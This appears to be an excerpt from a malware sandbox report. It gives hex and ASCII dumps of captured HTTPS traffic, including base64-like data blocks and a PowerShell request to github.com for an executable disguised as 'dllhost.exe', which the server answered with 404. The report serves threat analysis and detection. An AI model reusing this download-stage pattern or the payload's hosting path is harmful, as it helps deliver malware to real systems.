                                                                                              2022-08-10 04:48:02 UTC390INData Raw: 44 69 77 6c 55 71 6c 76 70 71 6c 55 46 69 4a 61 59 57 6f 68 78 59 6f 70 78 59 46 55 4e 69 4e 67 69 47 41 56 68 54 43 30 37 49 55 34 73 51 4d 4c 65 45 51 32 50 43 41 73 69 77 63 56 55 68 73 56 51 77 73 34 68 51 48 44 68 58 6d 54 6e 4e 67 66 38 41 43 67 59 57 48 67 49 44 67 64 30 51 63 45 55 63 41 6b 42 46 6f 30 64 57 41 34 63 49 47 46 6e 43 41 69 31 45 6a 43 33 65 55 55 63 52 43 45 48 48 68 41 57 51 62 45 37 4b 56 52 78 4f 79 72 49 34 6c 53 71 32 4b 55 48 46 4b 4e 68 34 70 53 6a 69 4e 6c 4b 44 69 4e 6b 6f 32 41 32 54 42 6b 63 65 41 67 4f 4a 36 49 4e 69 6f 4e 69 71 4e 6a 79 67 32 4b 41 34 6c 4d 6d 47 78 4b 6c 56 73 53 6c 42 78 50 41 52 4b 32 42 34 53 6a 59 38 71 56 57 78 37 70 52 73 45 35 54 6b 48 44 68 55 72 59 67 61 4b 4c 7a 68 69 4e 6b 4c 42 59 62 4b 31
                                                                                              Data Ascii: DiwlUqlvpqlUFiJaYWohxYopxYFUNiNgiGAVhTC07IU4sQMLeEQ2PCAsiwcVUhsVQws4hQHDhXmTnNgf8ACgYWHgIDgd0QcEUcAkBFo0dWA4cIGFnCAi1EjC3eUUcRCEHHhAWQbE7KVRxOyrI4lSq2KUHFKNh4pSjiNlKDiNko2A2TBkceAgOJ6INioNiqNjyg2KA4lMmGxKlVsSlBxPARK2B4SjY8qVWx7pRsE5TkHDhUrYgaKLzhiNkLBYbK1
                                                                                              2022-08-10 04:48:02 UTC391INData Raw: 55 56 6d 62 52 57 70 47 5a 52 57 59 4b 51 42 6b 47 49 44 6f 59 77 32 49 56 41 78 35 55 55 47 4b 71 4d 33 43 45 42 6b 55 4d 65 36 55 41 32 2b 43 69 34 4c 6a 79 68 41 78 4f 33 64 41 47 4b 69 74 69 69 42 68 39 7a 71 4c 6e 4a 54 62 32 53 68 54 59 69 2f 37 69 34 71 4c 51 78 43 49 58 41 4b 4b 51 32 4b 42 54 59 69 6b 4e 71 45 4b 62 56 42 4d 32 70 56 69 5a 74 52 63 45 4e 71 67 6d 62 4e 6b 61 77 6b 62 57 55 69 31 4d 32 71 43 4e 31 71 4b 6b 62 56 46 52 75 74 55 68 55 72 72 56 46 52 75 74 52 55 62 72 56 46 71 57 4d 71 4e 50 49 74 74 6f 75 7a 67 75 4c 52 73 72 68 46 37 62 64 57 57 73 59 5a 79 73 4c 65 45 46 72 62 59 52 4d 72 57 32 71 34 52 61 32 31 56 46 52 61 72 68 4d 71 69 30 37 4b 6b 55 46 6e 43 43 77 73 33 43 76 49 79 63 57 6e 6f 67 70 62 36 5a 51 7a 6c 51 57 4a
                                                                                              Data Ascii: UVmbRWpGZRWYKQBkGIDoYw2IVAx5UUGKqM3CEBkUMe6UA2+Ci4LjyhAxO3dAGKitiiBh9zqLnJTb2ShTYi/7i4qLQxCIXAKKQ2KBTYikNqEKbVBM2pViZtRcENqgmbNkawkbWUi1M2qCN1qKkbVFRutUhUrrVFRutRUbrVFqWMqNPIttouzguLRsrhF7bdWWsYZysLeEFrbYRMrW2q4Ra21VFRarhMqi07KkUFnCCws3CvIycWnogpb6ZQzlQWJ
                                                                                              2022-08-10 04:48:02 UTC393INData Raw: 77 4f 79 41 34 46 41 63 41 68 7a 43 4c 52 73 68 7a 44 6a 39 36 69 69 79 71 4d 79 55 46 75 45 47 5a 42 6d 52 59 4c 56 53 49 7a 64 30 47 59 4b 6a 4d 6b 47 38 74 6c 46 62 68 41 56 52 70 51 5a 43 4d 79 44 4d 70 67 79 7a 62 53 68 42 5a 4b 52 6d 38 45 56 6d 61 71 56 4f 64 6d 38 45 47 62 56 54 6d 57 30 57 47 71 74 52 6d 2f 42 52 57 62 68 4b 43 78 32 56 52 6d 55 49 33 64 46 5a 43 43 68 47 52 49 7a 49 72 4d 70 42 75 69 6f 33 56 51 5a 41 4b 61 4b 4b 79 6f 4b 49 45 61 71 4b 7a 42 56 41 4e 76 4c 4b 4b 42 42 51 42 6a 39 71 71 4d 67 43 69 35 5a 6b 4b 44 56 51 42 55 5a 52 51 5a 39 45 41 62 5a 43 41 31 58 51 42 49 41 79 6b 47 49 48 5a 41 47 31 43 74 51 70 47 36 42 53 4b 73 69 34 79 42 74 37 49 45 4e 72 66 63 70 46 6f 49 46 4e 71 67 51 69 76 47 69 4c 53 45 66 67 69 30 6a
                                                                                              Data Ascii: wOyA4FAcAhzCLRshzDj96iiyqMyUFuEGZBmRYLVSIzd0GYKjMkG8tlFbhAVRpQZCMyDMpgyzbShBZKRm8EVmaqVOdm8EGbVTmW0WGqtRm/BRWbhKCx2VRmUI3dFZCChGRIzIrMpBuio3VQZAKaKKyoKIEaqKzBVANvLKKBBQBj9qqMgCi5ZkKDVQBUZRQZ9EAbZCA1XQBIAykGIHZAG1CtQpG6BSKsi4yBt7IENrfcpFoIFNqgQivGiLSEfgi0j
                                                                                              2022-08-10 04:48:02 UTC394INData Raw: 65 46 53 33 2b 6c 66 37 34 54 64 6e 2b 75 2f 51 57 67 4e 53 37 31 62 6e 66 2f 73 77 70 71 2f 63 50 67 66 68 73 39 70 30 61 66 46 6c 64 50 32 46 78 76 78 31 37 50 70 31 65 46 54 2b 31 58 37 79 42 2f 36 68 2b 69 50 51 2b 70 2f 6d 4c 50 75 48 77 65 37 32 6e 64 36 32 73 2f 59 50 47 62 7a 52 33 75 6f 77 2f 70 58 2b 37 76 38 41 4e 2b 34 2f 6f 37 52 6f 52 39 51 76 2f 77 43 77 46 4d 2f 75 4a 77 6e 77 32 57 76 75 39 61 34 2b 77 65 4c 2b 4f 30 30 64 37 71 56 2f 74 54 2b 35 6d 6e 37 6e 2b 6d 69 76 79 33 2b 39 6d 57 50 63 54 68 74 31 72 36 63 4e 65 33 2f 45 37 33 52 30 5a 45 66 30 70 2f 63 69 51 2f 37 70 2b 6d 41 4a 71 4c 62 79 5a 55 7a 2b 34 6e 44 62 72 58 30 34 58 48 32 42 78 47 39 30 39 47 56 68 2f 53 6a 39 58 54 2f 66 48 6f 2f 39 31 64 2f 6e 4c 48 75 4c 73 64 7a
                                                                                              Data Ascii: eFS3+lf74Tdn+u/QWgNS71bnf/swpq/cPgfhs9p0afFldP2Fxvx17Pp1eFT+1X7yB/6h+iPQ+p/mLPuHwe72nd62s/YPGbzR3uow/pX+7v8AN+4/o7RoR9Qv/wCwFM/uJwnw2Wvu9a4+weL+O00d7qV/tT+5mn7n+mivy3+9mWPcTht1r6cNe3/E73R0ZEf0p/ciQ/7p+mAJqLbyZUz+4nDbrX04XH2BxG909GVh/Sj9XT/fHo/91d/nLHuLsdz
                                                                                              2022-08-10 04:48:02 UTC395INData Raw: 50 39 4b 76 30 51 4c 48 39 34 39 63 52 2f 38 41 43 74 66 33 70 37 6a 62 62 63 36 65 6e 50 55 65 33 2b 78 33 32 72 6f 78 31 72 66 32 71 2f 62 50 2f 77 42 6e 2b 71 64 74 72 50 63 79 35 2b 34 76 45 37 72 52 30 35 62 39 41 63 50 76 64 58 52 68 6a 2f 53 72 39 72 48 2f 41 4f 54 2f 41 46 56 57 66 47 7a 37 46 50 63 54 69 64 31 6f 36 63 72 36 41 34 62 65 36 2b 6a 44 66 32 70 2f 61 32 2f 39 55 2f 55 76 77 4c 4e 4f 79 65 34 6e 45 37 72 52 2b 50 57 65 67 4f 48 33 75 72 6f 77 70 62 2f 53 7a 39 6d 78 65 37 39 77 2f 57 33 58 61 74 39 4d 65 57 42 57 4d 2f 75 48 78 6c 35 4e 6e 73 2b 39 31 74 34 2b 77 65 45 6e 4c 74 4e 66 64 36 68 2f 74 5a 2b 79 6e 2f 38 41 76 2f 72 58 66 66 30 39 32 2f 77 4b 65 34 66 47 62 76 5a 39 37 78 4c 36 43 34 54 65 61 2b 37 31 42 2f 61 7a 39 6c 6c
                                                                                              Data Ascii: P9Kv0QLH949cR/8ACtf3p7jbbc6enPUe3+x32rox1rf2q/bP/wBn+qdtrPcy5+4vE7rR05b9AcPvdXRhj/Sr9rH/AOT/AFVWfGz7FPcTid1o6cr6A4be6+jDf2p/a2/9U/UvwLNOye4nE7rR+PWegOH3urowpb/Sz9mxe79w/W3Xat9MeWBWM/uHxl5Nns+91t4+weEnLtNfd6h/tZ+yn/8Av/rXff092/wKe4fGbvZ97xL6C4Tea+71B/az9ll
                                                                                              2022-08-10 04:48:02 UTC396INData Raw: 50 54 6c 6e 50 32 42 73 4c 79 62 62 56 30 59 4a 2f 61 76 39 45 49 2f 77 42 37 2b 75 2f 2f 41 50 46 61 33 76 56 39 78 64 74 75 64 50 54 6e 71 54 30 42 73 64 39 71 36 4d 64 59 6a 2b 6c 58 36 4b 50 2f 41 44 62 31 77 54 70 39 4f 32 49 36 70 37 69 37 62 63 36 65 6e 50 55 65 67 4e 6a 76 74 58 52 6a 72 4a 66 2f 41 45 70 2f 54 76 38 41 4a 2b 38 2b 72 61 47 2f 69 39 47 30 7a 2f 79 77 74 61 66 33 46 32 6b 35 64 68 6a 74 5a 36 6d 4e 58 37 66 37 4f 38 6d 32 7a 32 63 64 61 59 2f 70 56 36 4a 44 2f 77 43 2b 37 2b 66 39 41 43 33 2f 41 4d 78 58 33 46 31 37 6a 48 61 7a 34 55 39 76 39 47 2f 7a 32 66 71 4e 2f 61 6a 30 43 50 38 41 31 79 2f 70 39 41 66 36 78 50 63 58 58 75 4d 64 72 36 54 32 2f 77 42 47 2f 77 41 39 6e 36 6b 37 76 36 55 32 46 68 5a 2b 2b 45 41 36 6e 39 4f 43 2f
                                                                                              Data Ascii: PTlnP2BsLybbV0YJ/av9EI/wB7+u//APFa3vV9xdtudPTnqT0Bsd9q6MdYj+lX6KP/ADb1wTp9O2I6p7i7bc6enPUegNjvtXRjrJf/AEp/Tv8AJ+8+raG/i9G0z/ywtaf3F2k5dhjtZ6mNX7f7O8m2z2cdaY/pV6JD/wC+7+f9AC3/AMxX3F17jHaz4U9v9G/z2fqN/aj0CP8A1y/p9Af6xPcXXuMdr6T2/wBG/wA9n6k7v6U2FhZ++EA6n9OC/
                                                                                              2022-08-10 04:48:02 UTC397INData Raw: 6c 2b 2f 30 64 72 44 48 2b 44 34 2f 63 61 2b 7a 6c 47 2f 2b 58 50 33 36 30 34 6e 39 6b 2f 58 45 37 44 39 50 36 68 39 31 71 31 6a 7a 76 67 4d 2f 72 37 50 74 36 65 74 6e 50 6b 33 48 59 2f 51 32 6e 5a 31 64 54 6e 76 2f 41 47 44 39 38 74 44 33 66 73 33 36 36 30 62 6e 39 50 36 6f 2f 77 43 61 74 59 38 34 34 4c 50 4a 6a 62 37 50 74 36 65 74 6e 50 6c 50 47 34 35 39 6a 74 4f 78 71 36 6e 4f 66 32 62 39 33 59 6b 2f 74 58 36 77 41 56 50 30 50 55 2f 7a 56 72 2f 4b 63 4a 6e 6d 32 32 6a 74 61 65 74 6e 2f 47 38 56 6a 39 4c 58 32 63 39 54 6d 75 2f 61 76 33 47 66 2f 4c 2f 31 50 2f 64 58 2f 59 74 2f 31 2f 44 62 7a 54 32 73 64 62 50 39 44 78 47 37 31 64 6e 50 55 35 6a 2b 68 2f 57 41 6e 2f 77 6e 72 42 6f 49 2b 6e 64 48 6b 74 34 34 76 59 35 35 74 65 6e 70 77 78 6e 68 64 74 38
                                                                                              Data Ascii: l+/0drDH+D4/ca+zlG/+XP3604n9k/XE7D9P6h91q1jzvgM/r7Pt6etnPk3HY/Q2nZ1dTnv/AGD98tD3fs3660bn9P6o/wCatY844LPJjb7Pt6etnPlPG459jtOxq6nOf2b93Yk/tX6wAVP0PU/zVr/KcJnm22jtaetn/G8Vj9LX2c9Tmu/av3Gf/L/1P/dX/Yt/1/DbzT2sdbP9DxG71dnPU5j+h/WAn/wnrBoI+ndHkt44vY55tenpwxnhdt8
                                                                                              2022-08-10 04:48:02 UTC399INData Raw: 52 2f 77 55 41 5a 32 4a 6b 79 2b 79 41 41 58 55 4a 6a 4c 53 65 61 38 49 6a 41 45 68 32 30 39 6f 51 68 51 63 72 53 34 78 2f 77 7a 50 69 55 51 58 46 77 4a 41 32 63 75 79 4b 55 69 36 51 2b 37 4f 69 41 62 61 57 6b 59 6b 43 4e 51 65 46 51 70 64 69 7a 45 4d 56 46 54 78 6d 72 54 72 76 31 56 51 4f 43 4b 56 43 4b 54 47 50 6c 42 45 66 6c 5a 4b 69 5a 42 5a 68 4f 77 30 66 71 71 45 78 4c 6b 79 30 67 57 6f 4a 33 44 59 63 79 56 51 70 66 73 4e 53 32 6b 46 49 4a 33 57 42 77 44 4d 31 55 43 58 57 6b 30 30 68 30 48 4e 6a 57 37 57 57 39 67 74 43 56 77 63 47 44 75 36 43 4f 48 56 76 74 52 49 68 36 6c 6f 63 37 74 49 66 64 4d 49 68 64 62 55 55 32 38 46 52 79 2b 70 5a 5a 64 61 31 77 46 31 70 30 75 44 68 61 78 6e 4f 4d 33 43 5a 78 6a 50 4f 35 4c 2f 30 33 6f 58 5a 41 2b 6a 5a 63 2f
                                                                                              Data Ascii: R/wUAZ2Jky+yAAXUJjLSea8IjAEh209oQhQcrS4x/wzPiUQXFwJA2cuyKUi6Q+7OiAbaWkYkCNQeFQpdizEMVFTxmrTrv1VQOCKVCKTGPlBEflZKiZBZhOw0fqqExLky0gWoJ3DYcyVQpfsNS2kFIJ3WBwDM1UCXWk00h0HNjW7WW9gtCVwcGDu6COHVvtRIh6loc7tIfdMIhdbUU28FRy+pZZda1wF1p0uDhaxnOM3CZxjPO5L/03oXZA+jZc/
                                                                                              2022-08-10 04:48:02 UTC400INData Raw: 68 43 78 79 46 72 37 45 2b 5a 56 71 45 62 63 4d 2f 77 43 59 2f 69 6c 45 72 72 51 35 33 65 6f 38 56 61 45 49 44 67 6b 73 5a 63 4f 2f 5a 4b 4a 73 2f 77 41 70 46 50 62 6c 4d 68 53 42 49 49 5a 36 64 4f 79 6c 45 62 72 58 6d 52 71 7a 56 56 6f 6a 65 48 64 6e 66 65 69 6f 68 65 43 58 44 64 45 78 6b 52 4c 50 64 78 70 2b 43 49 35 37 72 5a 49 5a 70 56 6f 35 76 55 41 45 73 7a 36 46 58 47 55 63 39 2f 73 56 61 4f 65 38 61 48 73 45 52 7a 34 46 2b 31 56 61 4f 65 78 34 4b 4b 36 37 41 77 38 32 4b 67 36 62 4e 6e 72 54 64 42 30 57 6d 6d 78 71 6f 72 6f 73 42 67 56 49 31 55 48 54 61 54 75 37 30 41 55 56 61 30 55 30 61 6a 54 51 71 6d 46 37 63 69 57 6e 5a 31 46 64 46 75 54 62 75 6f 4c 57 76 54 32 36 71 43 67 6b 76 55 36 44 32 36 4b 69 6b 77 42 33 48 56 51 50 61 44 41 6d 4a 32 38
                                                                                              Data Ascii: hCxyFr7E+ZVqEbcM/wCY/ilErrQ53eo8VaEIDgksZcO/ZKJs/wApFPblMhSBIIZ6dOylEbrXmRqzVVojeHdnfeioheCXDdExkRLPdxp+CI57rZIZpVo5vUAEsz6FXGUc9/sVaOe8aHsERz4F+1VaOex4KK67Aw82Kg6bNnrTdB0WmmxqorosBgVI1UHTaTu70AUVa0U0ajTQqmF7ciWnZ1FdFuTbuoLWvT26qCgkvU6D26KikwB3HVQPaDAmJ28
                                                                                              2022-08-10 04:48:02 UTC401INData Raw: 68 70 4c 6d 66 69 6c 52 58 45 47 6c 57 59 74 7a 56 53 71 65 30 4e 37 76 77 51 55 74 63 4e 44 55 67 54 43 42 67 78 37 55 35 35 51 45 41 6b 6e 35 75 51 39 56 41 62 58 63 33 4d 2b 67 5a 42 55 38 51 64 42 38 46 42 76 7a 61 45 67 6c 75 79 6f 33 79 68 69 4e 66 42 69 71 6f 66 6e 6d 6f 61 49 38 70 54 6d 47 72 70 2b 61 70 4d 61 36 49 4b 45 47 43 41 48 4d 4d 64 65 69 42 6e 64 71 46 74 32 6f 6f 4d 54 32 5a 33 75 5a 41 4b 45 6d 70 46 47 30 6a 37 6b 6f 4c 61 74 51 36 4a 51 6f 4f 56 58 6d 68 4e 4f 69 6f 62 35 69 64 48 31 32 50 43 6c 77 43 47 59 52 6f 34 4e 59 4e 66 4a 4b 4d 77 4e 72 6b 50 50 75 31 4f 79 55 4f 54 54 52 39 43 6f 41 38 46 72 58 66 54 37 65 72 6f 41 7a 6b 53 39 72 77 43 50 73 56 6f 7a 6c 73 67 50 6c 71 64 79 6f 44 4c 37 7a 54 68 41 43 58 4a 64 6d 5a 69 4e
                                                                                              Data Ascii: hpLmfilRXEGlWYtzVSqe0N7vwQUtcNDUgTCBgx7U55QEAkn5uQ9VAbXc3M+gZBU8QdB8FBvzaEgluyo3yhiNfBiqofnmoaI8pTmGrp+apMa6IKEGCAHMMdeiBndqFt2ooMT2Z3uZAKEmpFG0j7koLatQ6JQoOVXmhNOiob5idH12PClwCGYRo4NYNfJKMwNrkPPu1OyUOTTR9CoA8FrXfT7eroAzkS9rwCPsVozlsgPlqdyoDL7zThACXJdmZiN
                                                                                              2022-08-10 04:48:02 UTC403INData Raw: 6a 37 77 71 67 37 67 79 4b 2f 59 6f 4d 54 4a 78 45 43 6b 78 75 45 42 6f 53 44 2f 46 37 4d 69 6a 69 59 6d 70 64 34 33 52 44 59 77 5a 6f 61 42 46 44 45 64 44 76 30 38 6b 51 77 45 30 49 62 65 58 32 52 51 63 51 51 48 34 37 46 45 42 6a 41 41 5a 67 49 44 66 65 67 59 75 57 46 76 56 39 44 71 67 44 61 6c 33 32 31 59 6f 43 61 30 2b 56 6e 37 6c 42 6e 6b 62 45 73 64 6b 56 72 4b 43 59 37 53 64 55 79 68 53 51 51 34 71 51 77 61 72 71 67 30 65 47 41 30 5a 51 45 45 79 4a 42 38 57 51 41 42 78 50 7a 53 38 37 6f 4d 4a 44 67 6b 68 6f 35 50 69 67 4a 31 4a 63 74 49 41 51 4b 77 67 48 58 53 6e 6c 33 51 4e 69 38 2f 6d 4c 75 32 6a 38 51 67 44 68 78 49 68 33 44 36 6c 42 68 56 7a 50 68 78 52 42 6f 63 4d 43 35 41 6f 47 65 69 6f 31 70 59 4d 58 70 4f 76 43 67 49 74 68 36 33 66 77 76 6f
                                                                                              Data Ascii: j7wqg7gyK/YoMTJxECkxuEBoSD/F7MijiYmpd43RDYwZoaBFDEdDv08kQwE0IbeX2RQcQQH47FEBjAAZgIDfegYuWFvV9DqgDal321YoCa0+Vn7lBnkbEsdkVrKCY7SdUyhSQQ4qQwarqg0eGA0ZQEEyJB8WQABxPzS87oMJDgkho5PigJ1JctIAQKwgHXSnl3QNi8/mLu2j8QgDhxIh3D6lBhVzPhxRBocMC5AoGeio1pYMXpOvCgIth63fwvo


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              5192.168.11.2049813140.82.121.4443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2022-08-10 04:48:02 UTC328OUTGET /gowgerrie/reborn/raw/main/04/dllhost.exe HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1151
                                                                                              Host: github.com
                                                                                              Connection: Keep-Alive
                                                                                              2022-08-10 04:48:03 UTC555INHTTP/1.1 404 Not Found
                                                                                              Server: GitHub.com
                                                                                              Date: Wed, 10 Aug 2022 04:48:03 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                              permissions-policy: interest-cohort=()
                                                                                              Cache-Control: no-cache
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                              X-Frame-Options: deny
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 0
                                                                                              Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
                                                                                              Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                              2022-08-10 04:48:03 UTC555INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                              Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.
                                                                                              2022-08-10 04:48:03 UTC557INData Raw: 31 38 33 38 0d 0a 0a 0a 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 22 61 75 74 6f 22 20 64 61 74 61 2d 6c 69 67 68 74 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 22 20 64 61 74 61 2d 64 61 72 6b 2d 74 68 65 6d 65 3d 22 64 61 72 6b 22 20 64 61 74 61 2d 61 31 31 79 2d 61 6e 69 6d 61 74 65 64 2d 69 6d 61 67 65 73 3d 22 73 79 73 74 65 6d 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 22 3e 0a 20
                                                                                              Data Ascii: 1838<!DOCTYPE html><html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com">
                                                                                              2022-08-10 04:48:03 UTC557INData Raw: 75 64 2e 73 33 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 73 65 72 2d 69 6d 61 67 65 73 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 76 61 74 61 72 73 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 22 3e 0a 0a 0a 0a 20 20 3c 6c
                                                                                              Data Ascii: ud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com"> <l
                                                                                              2022-08-10 04:48:03 UTC559INData Raw: 69 61 3d 22 61 6c 6c 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 35 31 32 2d 55 52 50 53 76 69 43 77 34 6d 34 6e 37 31 49 4b 6e 34 71 79 75 37 4d 45 44 70 47 62 43 69 54 66 73 4d 54 4e 72 55 6a 50 77 63 67 33 38 4b 74 45 4b 44 74 31 32 76 7a 6a 6c 4e 7a 6f 79 33 59 44 46 69 51 38 44 30 54 43 43 59 4b 43 74 72 5a 70 71 58 30 39 37 67 3d 3d 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 64 61 72 6b 5f 63 6f 6c 6f 72 62 6c 69 6e 64 2d 35 31 31 33 64 32 62 65 32 30 62 30 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 5f 63 6f 6c 6f 72
                                                                                              Data Ascii: ia="all" integrity="sha512-URPSviCw4m4n71IKn4qyu7MEDpGbCiTfsMTNrUjPwcg38KtEKDt12vzjlNzoy3YDFiQ8D0TCCYKCtrZpqX097g==" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-5113d2be20b0.css" /><link data-color-theme="light_color
                                                                                              2022-08-10 04:48:03 UTC560INData Raw: 30 66 30 37 38 62 2e 63 73 73 22 20 2f 3e 0a 20 20 0a 20 20 20 20 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 35 31 32 2d 53 55 71 79 45 51 6f 71 69 79 62 46 34 54 47 64 4c 48 30 74 68 34 76 44 4c 39 49 39 45 46 47 54 58 66 63 74 68 39 43 49 56 41 6f 4e 65 51 4a 66 41 79 66 75 38 4d 74 6d 4f 4d 57 62 47 6e 71 50 36 56 78 46 49 51 36 56 64 44 48 78 68 64 58 4e 47 31 6b 2f 2f 51 3d 3d 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 70 72 69 6d 65 72 2d 34 39 34 61 62 32 31 31 30 61 32 61 2e 63
                                                                                              Data Ascii: 0f078b.css" /> <link crossorigin="anonymous" media="all" integrity="sha512-SUqyEQoqiybF4TGdLH0th4vDL9I9EFGTXfcth9CIVAoNeQJfAyfu8MtmOMWbGnqP6VxFIQ6VdDHxhdXNG1k//Q==" rel="stylesheet" href="https://github.githubassets.com/assets/primer-494ab2110a2a.c
                                                                                              2022-08-10 04:48:03 UTC561INData Raw: 53 68 5a 56 72 62 4e 66 73 55 55 5a 52 70 30 61 32 52 43 5a 4e 59 72 46 4a 59 46 6c 59 68 64 44 55 32 50 2b 55 43 38 61 78 67 56 54 31 37 6f 71 76 31 42 56 51 4c 6e 67 53 73 47 6f 69 42 4e 32 4d 4a 70 77 3d 3d 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 6d 61 6e 75 65 6c 70 75 79 6f 6c 5f 74 75 72 62 6f 5f 64 69 73 74 5f 74 75 72 62 6f 5f 65 73 32 30 31 37 2d 65 73 6d 5f 6a 73 2d 38 61 66 39 62 61 65 66 61 62 39 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79
                                                                                              Data Ascii: ShZVrbNfsUUZRp0a2RCZNYrFJYFlYhdDU2P+UC8axgVT17oqv1BVQLngSsGoiBN2MJpw==" src="https://github.githubassets.com/assets/vendors-node_modules_manuelpuyol_turbo_dist_turbo_es2017-esm_js-8af9baefab9e.js"></script><script crossorigin="anonymous" defer="defer" ty
